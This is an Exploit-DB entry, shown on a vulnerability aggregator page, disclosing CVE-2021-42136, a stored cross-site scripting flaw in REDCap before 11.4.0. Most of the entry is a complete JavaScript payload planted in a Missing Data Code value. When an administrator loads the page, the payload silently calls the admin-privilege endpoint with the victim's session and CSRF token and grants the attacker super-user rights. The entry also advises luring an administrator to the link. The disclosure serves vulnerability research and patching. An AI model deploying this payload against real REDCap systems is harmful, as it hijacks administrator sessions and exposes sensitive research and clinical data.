REDCap 11.3.9 - Stored Cross Site Scripting

🗓️ 19 Apr 2022 00:00:00Reported by Kendrick LamType

exploitdb🔗 www.exploit-db.com👁 282 Views

Redcap 11.3.9: Stored Cross Site Scripting, Escalation of User's Privilege

Reporter	Title	Published	Views	Family All 12
0day.today	REDCap Cross Site Scripting Vulnerability	14 Apr 202200:00	–	zdt
0day.today	REDCap 11.3.9 - Stored Cross Site Scripting Vulnerability	19 Apr 202200:00	–	zdt
Circl	CVE-2021-42136	13 Apr 202220:18	–	circl
CNNVD	REDCap 跨站脚本漏洞	13 Apr 202200:00	–	cnnvd
CNVD	REDCap Cross-Site Scripting Vulnerability (CNVD-2022-81345)	15 Apr 202200:00	–	cnvd
CVE	CVE-2021-42136	13 Apr 202215:32	–	cve
Cvelist	CVE-2021-42136	13 Apr 202215:32	–	cvelist
EUVD	EUVD-2021-29119	3 Oct 202520:07	–	euvd
NVD	CVE-2021-42136	13 Apr 202216:15	–	nvd
Packet Storm	REDCap Cross Site Scripting	14 Apr 202200:00	–	packetstorm

# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting
# Date: 2021-10-11
# Exploit Author: Kendrick Lam 
# References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js
# Vendor Homepage: https://projectredcap.org
# Software Link: https://projectredcap.org
# Version: Redcap before 11.4.0
# Tested on: 11.2.5
# CVE: CVE-2021-42136
# Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf

### Stored XSS – Missing Data Code Value (found by Kendrick Lam)

It was possible to store JavaScript as values for Missing Data Codes.

- Where: Missing Data Code.
- Payload: 
		<script>
		var target = document.location.host;
		var csrf_token = csrf_token;
		var userId = '<userId>'; // Replace with your user ID.

		function privesc()
		{
			var xhr = new XMLHttpRequest();
			xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true);
			xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
			xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
			xhr.withCredentials = "true";
			var body = "";
			body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token;
			xhr.send(body);
			return true;
		}

		privesc();
		</script>
- Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator).
- Privileges: Low privileged / regular user
- Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX

- Privileges:
  + Store: Low privileged user is able to store Missing Data Code values.
  + Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX

19 Apr 2022 00:00Current

7High risk

Vulners AI Score7

CVSS 23.5

CVSS 3.19

EPSS0.01758